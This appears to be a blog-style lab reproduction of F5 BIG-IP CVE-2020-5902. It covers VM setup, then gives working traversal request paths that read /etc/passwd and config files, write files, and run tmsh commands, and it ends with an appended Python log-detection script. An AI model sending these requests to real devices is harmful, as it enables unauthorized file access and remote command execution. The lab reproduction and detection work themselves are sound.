F5 BIG-IP CVE-2020-5902 Vulnerability Reproduction

Environment setup:

Register and log in at f5.com

Download link: http://downloads05.f5.com/esd/download.sv?loc=downloads05.f5.com/downloads/2d436b59-25af-43c4-ab3f-9ebb1d6f5ee6/BIGIP-14.1.2-0.0.37.ALL-scsi.ova

Mirror hosted on this site: (http://rita888.github.io/download/BIGIP-14.1.2-0.0.37.ALL-scsi.ova)

Once the download completes, import the OVA as a virtual machine.

Choose the deployment options.

Wait for the VM to boot.

Enter the default username root and password default. After logging in you must reset the password; any value works [bigip123].

Type config, click OK on the screen that appears, and choose IPv4.

When asked whether to use the default address, I chose No and then set the IP configuration (I switched the VM's network setting to NAT mode and rebooted).

Log in from the host machine; note that the URL must use https.

Logging in with admin/admin failed. I looked up a method on Baidu, reset the admin password from the command line, and then logged in successfully.

Wait a moment for the interface to load, then click Next to activate.

The key is obtained by email after registering and logging in on the F5 website (if you have not registered yet, register first).

Enter the key, select Manual, and click Next.

Obtain the Dossier, then click the link in Step 2 to get the license.

Copy and paste the license.

Then simply wait for the reset to complete.

Reproduction:

Arbitrary file read:

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

File upload:

# Save endpoint
/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=Vultest
# Read endpoint
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/test

The upload request returns no feedback: https://192.168.116.144/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=Vultest

Reading the file back confirms the write.

RCE:

# tmsh endpoint
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
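
A detection sketch for the request pattern reproduced above, added here as an example (not code from the original post): it scans access-log lines for a `..;` path segment under /tmui/ and reports which workspace JSP was reached. The combined log format, the constructed sample lines, and the percent-decoding of variants such as %3b are assumptions that go beyond the literal URLs shown on this page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Workspace JSPs named on this page, mapped to what a hit means for triage.
ENDPOINTS = {"fileRead.jsp": "file read", "fileSave.jsp": "file write", "tmshCmd.jsp": "tmsh command"}

SAMPLE_LOG = [  # constructed lines using documentation IP addresses
    '198.51.100.7 - - [08/Jul/2020:18:19:10 +0800] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1523',
    '198.51.100.7 - - [08/Jul/2020:18:54:49 +0800] "GET /tmui/login.jsp/..%3b/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 310',
    '192.0.2.10 - - [08/Jul/2020:17:36:28 +0800] "GET /tmui/login.jsp HTTP/1.1" 200 4096',
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %3b and %253b both normalise to ';'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return a finding dict for a CVE-2020-5902 style request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = decode_fully(parts.path)
    # The bypass marker is a path segment starting with '..;' under /tmui/.
    segments = path.split("/")
    if not path.lower().startswith("/tmui/") or not any(s.startswith("..;") for s in segments):
        return None
    endpoint = segments[-1]
    query = parse_qs(parts.query)
    arg = (query.get("fileName") or query.get("command") or [""])[0]
    return {"action": ENDPOINTS.get(endpoint, "other"), "argument": arg, "status": int(m["status"])}


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        finding = classify(line)
        if finding:
            print(finding)
```

A 200 status on a flagged request means the management interface answered it and the device should be treated as exposed until patched and reviewed.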
